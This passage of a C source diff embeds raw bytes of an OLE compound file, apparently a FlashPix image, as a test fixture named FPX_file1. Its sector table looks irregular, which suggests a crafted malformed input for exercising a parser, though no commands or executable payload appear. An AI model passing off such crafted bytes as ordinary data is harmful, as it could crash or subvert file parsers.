+"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa"
+"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee"
+"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85"
+"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7"
+"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68"
+"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b"
+"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01"
+"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b"
+"\x43\x45\x32\xe3";
+
+unsigned char FPX_file1[] = 
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
+"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
+"\x02\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x65\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfd\xff\xff\xff\x04\x00\x00\x00\x97\x00\x00\x00\x05\x00\x00\x00"
+"\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00"
+"\x13\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
+"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
+"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
+"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
+"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
+"\x2d\x00\x00\x00\x2e\x00\x00\x00\x31\x00\x00\x00\x95\x00\x00\x00"
+"\xfe\xff\xff\xff\x32\x00\x00\x00\x33\x00\x00\x00\x36\x00\x00\x00"
+"\x35\x00\x00\x00\x41\x00\x00\x00\x27\x00\x00\x00\x34\x00\x00\x00"
+"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00"
+"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
+"\x4d\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00"
+"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
+"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
+"\x4e\x00\x00\x00\x50\x00\x00\x00\x4f\x00\x00\x00\x51\x00\x00\x00"
+"\x54\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x56\x00\x00\x00"
+"\x55\x00\x00\x00\x58\x00\x00\x00\x57\x00\x00\x00\x59\x00\x00\x00"
+"\x5b\x00\x00\x00\x5a\x00\x00\x00\x5c\x00\x00\x00\x61\x00\x00\x00"
+"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
+"\x62\x00\x00\x00\x64\x00\x00\x00\x63\x00\x00\x00\xfe\xff\xff\xff"
+"\xfe\xff\xff\xff\xfd\xff\xff\xff\x67\x00\x00\x00\x68\x00\x00\x00"
+"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
+"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00"
+"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
+"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
+"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
+"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00"
+"\x00\x67\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x03\x00\x00\x00\x40\x22\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\x16\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x66\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x47\x00\x6c\x00\x6f\x00\x62\x00\x61\x00\x6c\x00\x20\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x1a\x00\x02\x00\x04\x00\x00\x00\x09\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x0c\x00\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00"
+"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00"
+"\x30\x00\x30\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\x02\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x0e\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\xff\xff\xfe\xff\xff\xff\x03\x00\x00\x00\x61\x00\x00\x00"
+"\x05\x00\x00\x00\xfe\xff\xff\xff\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x09\x00\x00\x00\x85\x00\x00\x00\x0b\x00\x00\x00\xfe\xff\xff\xff"
+"\x0d\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x62\x00\x00\x00\x16\x00\x00\x00\x19\x00\x00\x00\x71\x00\x00\x00"
+"\x22\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x21\x00\x00\x00\x58\x00\x00\x00\x23\x00\x00\x00\x25\x00\x00\x00"
+"\x7f\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00"
+"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00"
+"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00"
+"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00"
+"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00"
+"\x39\x00\x00\x00\x3a\x00\x00\x00\xfe\xff\xff\xff\x3c\x00\x00\x00"
+"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00"
+"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x06\x00\x00\x00"
+"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00"
+"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00"
+"\xfe\xff\xff\xff\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00"
+"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00"
+"\x55\x00\x00\x00\x3b\x00\x00\x00\x57\x00\x00\x00\x67\x00\x00\x00"
+"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00"
+"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00"
+"\x4d\x00\x00\x00\xfe\xff\xff\xff\x63\x00\x00\x00\xfe\xff\xff\xff"
+"\x70\x00\x00\x00\x83\x00\x00\x00\x56\x00\x00\x00\x68\x00\x00\x00"
+"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00"
+"\x6d\x00\x00\x00\x18\x00\x00\x00\x84\x00\x00\x00\x44\x00\x00\x00"
+"\xfe\xff\xff\xff\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00"
+"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00"
+"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00"
+"\x7d\x00\x00\x00\x7e\x00\x00\x00\xfe\xff\xff\xff\x80\x00\x00\x00"
+"\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\xf9\x4f\x68\x10"
+"\xab\x91\x08\x00\x2b\x27\xb3\xd9\x01\x00\x00\x00\xe0\x85\x9f\xf2"
+"\xf9\x4f\x68\x10\xab\x91\x08\x00\x2b\x27\xb3\xd9\x30\x00\x00\x00"
+"\x98\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x50\x00\x00\x00"
+"\x02\x4e\x47\x4d\xb9\x3a\x63\x6c\x89\xef\x53\x82\x13\x00\x00\x00"
+"\x01\x00\x01\x00\x13\x00\x00\x00\x00\x00\x00\x00\x13\x10\x00\x00"
+"\x01\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\xb6\x01\x00\x00"
+"\x13\x00\x00\x00\xfd\x01\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x80\x60\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x80\x60\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x64\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x30\x00\x00\x00"
+"\x00\x00\x01\x00\x38\x00\x00\x00\x00\x01\x01\x00\x4c\x00\x00\x00"
+"\x01\x01\x01\x00\x54\x00\x00\x00\x02\x01\x01\x00\x5c\x00\x00\x00"
+"\x02\x00\x00\x00\xb0\x04\x00\x00\x48\x00\x00\x00\xd6\x08\x53\x92"
+"\x00\xac\xfb\x41\x89\xda\x62\x96\xad\x98\xbd\xc7\x13\x00\x00\x00"
+"\x01\x00\xfe\xff\x03\x0a\x00\x00\xff\xff\xff\xff\x00\x67\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x00\x00\x00\x00"
+"\x27\x00\x00\x00\x7b\x35\x36\x36\x31\x36\x37\x30\x30\x2d\x43\x31"
+"\x35\x34\x2d\x31\x31\x43\x45\x2d\x38\x35\x35\x33\x2d\x30\x30\x41"
+"\x41\x30\x30\x41\x31\x46\x39\x35\x42\x7d\x00\x00\x00\x00\x00\xf4"
+"\x39\xb2\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01"
+"\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07"
+"\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33"
+"\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19"
+"\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46"
+"\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66"
+"\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85"
+"\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x04\x00\x00\x00\x5f\x00\x00\x00\x00\x00\x00\x00"
+"\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00\x6a\x00"
+"\x65\x00\x63\x00\x74\x00\x20\x00\x53\x00\x74\x00\x6f\x00\x72\x00"
+"\x65\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x31\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x32\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x07\x00\x00\x00"
+"\x00\x60\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x99\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x49\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x20\x00\x43\x00"
+"\x6f\x00\x6e\x00\x74\x00\x65\x00\x6e\x00\x74\x00\x73\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x20\x00\x02\x01\x08\x00\x00\x00\x0a\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x15\x00\x00\x00\x68\x0b\x00\x00\x00\x00\x00\x00"
+"\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba"
+"\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8"
+"\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6"
+"\xf7\xf8\xf9\xfa\xff\xd9\xc7\x01\x13\x00\x00\x00\x04\x00\x00\x00"
+"\x13\x00\x00\x00\xfd\x01\x00\x00\x13\x00\x00\x00\xb6\x01\x00\x00"
+"\x04\x00\x00\x00\x85\x42\x21\x3d\x04\x00\x00\x00\x70\x66\x3b\x3d"
+"\x13\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\xfd\x01\x00\x00"
+"\x13\x00\x00\x00\xb6\x01\x00\x00\x41\x00\x00\x00\x14\x00\x00\x00"
+"\x01\x00\xfe\xff\x03\x0a\x00\x00\xff\xff\xff\xff\x00\x60\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x00\x00\x00\x00"
+"\x27\x00\x00\x00\x7b\x35\x36\x36\x31\x36\x30\x30\x30\x2d\x43\x31"
+"\x35\x34\x2d\x31\x31\x43\x45\x2d\x38\x35\x35\x33\x2d\x30\x30\x41"
+"\x41\x30\x30\x41\x31\x46\x39\x35\x42\x7d\x00\x00\x00\x00\x00\xf4"
+"\x39\xb2\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6f\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6f\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x5c\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x30\x00\x00\x00"
+"\x00\x01\x01\x00\x38\x00\x00\x00\x01\x01\x01\x00\x44\x00\x00\x00"
+"\x02\x01\x01\x00\x4c\x00\x00\x00\x03\x01\x01\x00\x54\x00\x00\x00"
+"\x02\x00\x00\x00\xb0\x04\x00\x00\x13\x10\x00\x00\x01\x00\x00\x00"
+"\x02\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x13\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x80\x60\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x80\x60\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x88\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
+"\x00\x00\x01\x00\x48\x00\x00\x00\x00\x01\x01\x00\x5c\x00\x00\x00"
+"\x01\x01\x01\x00\x64\x00\x00\x00\x02\x01\x01\x00\x6c\x00\x00\x00"
+"\x00\x00\x00\x10\x78\x00\x00\x00\x01\x00\x00\x10\x80\x00\x00\x00"
+"\x02\x00\x00\x00\xb0\x04\x00\x00\x48\x00\x00\x00\xbc\xec\xba\x23"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x0a\x00\x00\x00\x5f\x00\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x54\x00\x72\x00\x61\x00\x6e\x00\x73\x00\x66\x00\x6f\x00"
+"\x72\x00\x6d\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"
+"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x24\x00\x02\x01\x17\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x10\x00\x00\x00\xa8\x01\x00\x00\x00\x00\x00\x00"
+"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
+"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x33\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x20\x00\x01\x00\x10\x00\x00\x00\x06\x00\x00\x00\x0b\x00\x00\x00"
+"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\x40\xba\xad\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
+"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x2a\x00\x02\x01\x0c\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x17\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x6a\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x6a\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x78\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00"
+"\x02\x00\x00\x10\x70\x00\x00\x00\x03\x00\x00\x10\x78\x00\x00\x00"
+"\x04\x00\x00\x10\xc0\x00\x00\x00\x05\x00\x00\x10\x08\x01\x00\x00"
+"\x00\x00\x01\x00\x10\x01\x00\x00\x01\x00\x01\x00\x24\x01\x00\x00"
+"\x00\x01\x01\x00\x38\x01\x00\x00\x01\x01\x01\x00\x44\x01\x00\x00"
+"\x02\x01\x01\x00\x50\x01\x00\x00\x01\x00\x00\x10\x58\x01\x00\x00"
+"\x00\x00\x00\x10\x70\x01\x00\x00\x02\x00\x00\x00\xb0\x04\x00\x00"
+"\x04\x00\x00\x00\x00\x00\x00\x00\x04\x10\x00\x00\x10\x00\x00\x00"
+"\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00"
